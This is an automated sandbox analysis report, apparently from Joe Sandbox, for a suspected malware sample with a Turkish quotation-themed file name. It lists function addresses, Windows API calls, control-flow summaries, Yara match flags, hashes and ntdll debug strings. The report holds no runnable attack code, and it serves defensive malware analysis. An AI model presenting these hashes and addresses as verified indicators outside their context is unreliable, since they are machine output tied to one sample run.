                                                                                                              Function 01B82F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: db0939e1c929076955ff3142cf23b5ce1cb94824369a9ac238f49469f04c7176
                                                                                                              • Instruction ID: b16bb0e262e2a9962b483ebb280a93c7481d7a947f450d4de3ce7601ed0455bc
                                                                                                              • Opcode Fuzzy Hash: db0939e1c929076955ff3142cf23b5ce1cb94824369a9ac238f49469f04c7176
                                                                                                              • Instruction Fuzzy Hash: 5C90023220180802D6047158481470B000597D1302F55C061A1168556DC72989526675
                                                                                                              Function 01B82FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 368a8f3380f9ba384ee73fe0348fd9fdf525f14a1fffed9092d64eb481791913
                                                                                                              • Instruction ID: da8977ec875e08c6db9482a3c64a83858759981341c5f69dad75e3fa19887f20
                                                                                                              • Opcode Fuzzy Hash: 368a8f3380f9ba384ee73fe0348fd9fdf525f14a1fffed9092d64eb481791913
                                                                                                              • Instruction Fuzzy Hash: BF900222211C0442D70475684C14B07000597D1303F55C165A0158555CCA1989625625
                                                                                                              Function 01B82F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 9880d80260f24472ea3602def426391014f8fe10f07b00a03dbe4308fa009a0f
                                                                                                              • Instruction ID: 539c19ad9e35f596ef4114aa8862ce765092b7eb41259af0524cce5c85aeedf4
                                                                                                              • Opcode Fuzzy Hash: 9880d80260f24472ea3602def426391014f8fe10f07b00a03dbe4308fa009a0f
                                                                                                              • Instruction Fuzzy Hash: F990026234140842D60471584414B060005D7E2301F55C065E1068555DC71DCD53622A
                                                                                                              Function 01B82EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d49176e7851880baab6137736cf23a114d97d983ad445374812ee062c246f4d0
                                                                                                              • Instruction ID: 1fad8134b818dc0237564c650648e296c4963c83d79114cc50bcc2fadda6f518
                                                                                                              • Opcode Fuzzy Hash: d49176e7851880baab6137736cf23a114d97d983ad445374812ee062c246f4d0
                                                                                                              • Instruction Fuzzy Hash: 4590027220140802D64471584404746000597D1301F55C061A5068555EC75D8ED66769
                                                                                                              Function 01B82E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 95b5584350a04124bc787da9115de6ef32ddde70ac7372276977a09d3e904b29
                                                                                                              • Instruction ID: ab8d2c2b8890bcb4b880f311272a8bf711e76ea59e56d0d6a27e6899a97239ca
                                                                                                              • Opcode Fuzzy Hash: 95b5584350a04124bc787da9115de6ef32ddde70ac7372276977a09d3e904b29
                                                                                                              • Instruction Fuzzy Hash: 3190022260140902D60571584404616000A97D1241F95C072A1028556ECB298A93A235
                                                                                                              Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                              • Instruction ID: 0cf1d1cfbff413d406b9f50454d57ab941c4b3e8ec75440de5a7d7d7e128ebbb
                                                                                                              • Opcode Fuzzy Hash: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                              • Instruction Fuzzy Hash: 24210AB2D4020857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                                                              Function 0041A632 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 11 41a632-41a639 12 41a6a3-41a6a8 ExitProcess 11->12 13 41a63b 11->13 14 41a5f6-41a5fd 13->14 15 41a63d 13->15 16 41a61b-41a631 RtlAllocateHeap 15->16 17 41a63f 15->17 17->12
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateExitHeapProcess
                                                                                                              • String ID: 6EA
                                                                                                              • API String ID: 1054155344-1400015478
                                                                                                              • Opcode ID: 47508782786a64f1a4d8e9ee814f552b76b8f1e01370df25776678557343657f
                                                                                                              • Instruction ID: f3a8626008191923e07bac595a229e4eb5614c867216e2dd50514f9d6a1fbb57
                                                                                                              • Opcode Fuzzy Hash: 47508782786a64f1a4d8e9ee814f552b76b8f1e01370df25776678557343657f
                                                                                                              • Instruction Fuzzy Hash: 6CE0C27510B1983AEB18A7B03E858F77F1DC8C121472C4AEAFACC9E407C429916283A6
                                                                                                              Function 0041A600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 19 41a600-41a631 call 41af30 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID: 6EA
                                                                                                              • API String ID: 1279760036-1400015478
                                                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                              • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                                                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                              • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0
                                                                                                              Function 0041A5C6 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 217 41a5c6-41a5cc 218 41a59d-41a5a7 call 41af30 217->218 219 41a5ce 217->219 224 41a5ac-41a5c1 call 1b82c70 218->224 221 41a5d0-41a5fd call 41af30 219->221 222 41a64b-41a657 call 41af30 219->222 226 41a65c-41a671 RtlFreeHeap 222->226 228 41a5c3-41a5c5 224->228
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 151e719e1fe50e17b4ef87342ef9202b6ccf1721b88ce42bd16b803d403f5492
                                                                                                              • Instruction ID: 710bbcc343550d2e60226a4eb97f5427688d4fc6556b828fe111e3aabe4103ba
                                                                                                              • Opcode Fuzzy Hash: 151e719e1fe50e17b4ef87342ef9202b6ccf1721b88ce42bd16b803d403f5492
                                                                                                              • Instruction Fuzzy Hash: 6E11C2B92053046FDB14EFA8DC81CEB77A8EF84318B40854AFC5947302D234E962CBB5
                                                                                                              Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 231 408310-40833d call 41be30 call 41c9d0 236 408343-40835a call 414e50 231->236 237 40833e call 40acf0 231->237 240 40835c-40836e PostThreadMessageW 236->240 241 40838e-408392 236->241 237->236 242 408370-40838a call 40a480 240->242 243 40838d 240->243 242->243 243->241
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1836367815-0
                                                                                                              • Opcode ID: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                              • Instruction ID: 43d593e10ad008c4695c17d6314bf6f3e92d4c432431edd93db89b762a987e15
                                                                                                              • Opcode Fuzzy Hash: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                              • Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                                              Function 004082D3 Relevance: 1.6, APIs: 1, Instructions: 52threadwindowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 246 4082d3-4082df 247 4082e1-4082fd call 41b870 call 41b720 246->247 248 408337-40835a call 40acf0 call 414e50 246->248 257 40835c-40836e PostThreadMessageW 248->257 258 40838e-408392 248->258 259 408370-40838a call 40a480 257->259 260 40838d 257->260 259->260 260->258
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1836367815-0
                                                                                                              • Opcode ID: 7c12312fb9c11a5d82f084d113b032006b16db5ca1e92a579f808e6171a4af43
                                                                                                              • Instruction ID: 967da45d43d500b0c3c5d9e15febe837a69d4a3a08b03dd864461a48f287fc59
                                                                                                              • Opcode Fuzzy Hash: 7c12312fb9c11a5d82f084d113b032006b16db5ca1e92a579f808e6171a4af43
                                                                                                              • Instruction Fuzzy Hash: F1017D32A4032932E62166653D43FFA730C9B41F64F04017FFE04FB2C1EAA9A91142EA
                                                                                                              Function 0041A640 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 287 41a640-41a656 288 41a65c-41a671 RtlFreeHeap 287->288 289 41a657 call 41af30 287->289 289->288
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                              • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
                                                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                              • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
                                                                                                              Function 0041A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 290 41a7a0-41a7d4 call 41af30 LookupPrivilegeValueW
                                                                                                              APIs
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3899507212-0
                                                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                              • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
                                                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                              • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                              Function 0041A680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                              • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
                                                                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                              • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
                                                                                                              Function 01B82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e0aeff5d916e3c5535c17e4adb8359cd7f8d8a0501629f250e4fe94da85f6f2e
                                                                                                              • Instruction ID: f0e56b67e83ce8e650163256e8ddc64d757f3750273f2464dcef1581d0ef8abd
                                                                                                              • Opcode Fuzzy Hash: e0aeff5d916e3c5535c17e4adb8359cd7f8d8a0501629f250e4fe94da85f6f2e
                                                                                                              • Instruction Fuzzy Hash: 3EB09B729015C5C5DF15F76446087177900B7D1701F15C0F1D2034646F473CC1D1E675

                                                                                                              Non-executed Functions

                                                                                                              Function 01BC2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              • Opcode ID: 64f88f7b2769d3843133dccfd877854775f05027b830719d78c1829b4e5a4e45
                                                                                                              • Instruction ID: 65be6691ca980a4b9bcc2f5b620a3549f770b7fddc4609f46236310d093b95c2
                                                                                                              • Opcode Fuzzy Hash: 64f88f7b2769d3843133dccfd877854775f05027b830719d78c1829b4e5a4e45
                                                                                                              • Instruction Fuzzy Hash: AB928F71604342AFEB29DF19C880B6BB7E8FB94B50F0449ADFA95D7260D770E844CB52
                                                                                                              Function 01B78620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Thread identifier, xrefs: 01BB553A
                                                                                                              • double initialized or corrupted critical section, xrefs: 01BB5508
                                                                                                              • Address of the debug info found in the active list., xrefs: 01BB54AE, 01BB54FA
                                                                                                              • Invalid debug info address of this critical section, xrefs: 01BB54B6
                                                                                                              • undeleted critical section in freed memory, xrefs: 01BB542B
                                                                                                              • Critical section address., xrefs: 01BB5502
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01BB540A, 01BB5496, 01BB5519
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01BB54CE
                                                                                                              • Critical section address, xrefs: 01BB5425, 01BB54BC, 01BB5534
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01BB54E2
                                                                                                              • 8, xrefs: 01BB52E3
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01BB5543
                                                                                                              • Critical section debug info address, xrefs: 01BB541F, 01BB552E
                                                                                                              • corrupted critical section, xrefs: 01BB54C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              • API String ID: 0-2368682639
                                                                                                              • Opcode ID: bec2510854721df56d2049d52a063a292e331586f8dc288d9af9359c858dfc0c
                                                                                                              • Instruction ID: 1e0260e75404b496276644a62277b153986b76d6ea11cff319851d367efcb9a3
                                                                                                              • Opcode Fuzzy Hash: bec2510854721df56d2049d52a063a292e331586f8dc288d9af9359c858dfc0c
                                                                                                              • Instruction Fuzzy Hash: 6081ACB0A01358AFEB28CF99C885BEEBBF5FB48B10F104199F509B7650D3B5A944CB51
                                                                                                              Function 01B729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • @, xrefs: 01BB259B
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01BB2412
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01BB24C0
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01BB22E4
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01BB2506
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01BB2409
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01BB2624
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 01BB261F
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01BB2602
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01BB2498
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01BB25EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              • API String ID: 0-4009184096
                                                                                                              • Opcode ID: 5aca815ec4bd546c605fff2aa2c85839188f2c4657e82eb1578ee33f035d7f60
                                                                                                              • Instruction ID: a4bab23d7c4ffadc9e19e9f8d1d3b32c46b74739ce2f087f6915cf8f3918c318
                                                                                                              • Opcode Fuzzy Hash: 5aca815ec4bd546c605fff2aa2c85839188f2c4657e82eb1578ee33f035d7f60
                                                                                                              • Instruction Fuzzy Hash: E2026FB1D002299FDF29DB64CC81BEAB7B8AF54704F0041DAE659A7241DB70AF84CF59
                                                                                                              Function 01BE8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              • API String ID: 0-2515994595
                                                                                                              • Opcode ID: c39f7cee0b679ff0c1543e38d388dd3c44c59673934849d226a0508e6c081f30
                                                                                                              • Instruction ID: 39092e2d6bcaeddcef60722adab764c60f5691bf2428d6bc1652bfc184883b75
                                                                                                              • Opcode Fuzzy Hash: c39f7cee0b679ff0c1543e38d388dd3c44c59673934849d226a0508e6c081f30
                                                                                                              • Instruction Fuzzy Hash: 5751DF71104B019BC72EDF198848BABBBECFF95740F544A9DE999C3244EB71D608CB92
                                                                                                              Function 01BF0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              • Opcode ID: 54002d9284cf041d75b339318497006e1514f34c03098cb267e2eb9194d53060
                                                                                                              • Instruction ID: 27e05cfa7d299bb7e1a562a8ba59a2076821bec7b0de34dcb15d9b2ca0709180
                                                                                                              • Opcode Fuzzy Hash: 54002d9284cf041d75b339318497006e1514f34c03098cb267e2eb9194d53060
                                                                                                              • Instruction Fuzzy Hash: 2ED1E135500681EFDB2AEF68C441AA9BBF2FF9A700F0981DDF6459B262C734D948CB50
                                                                                                              Function 01BC89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
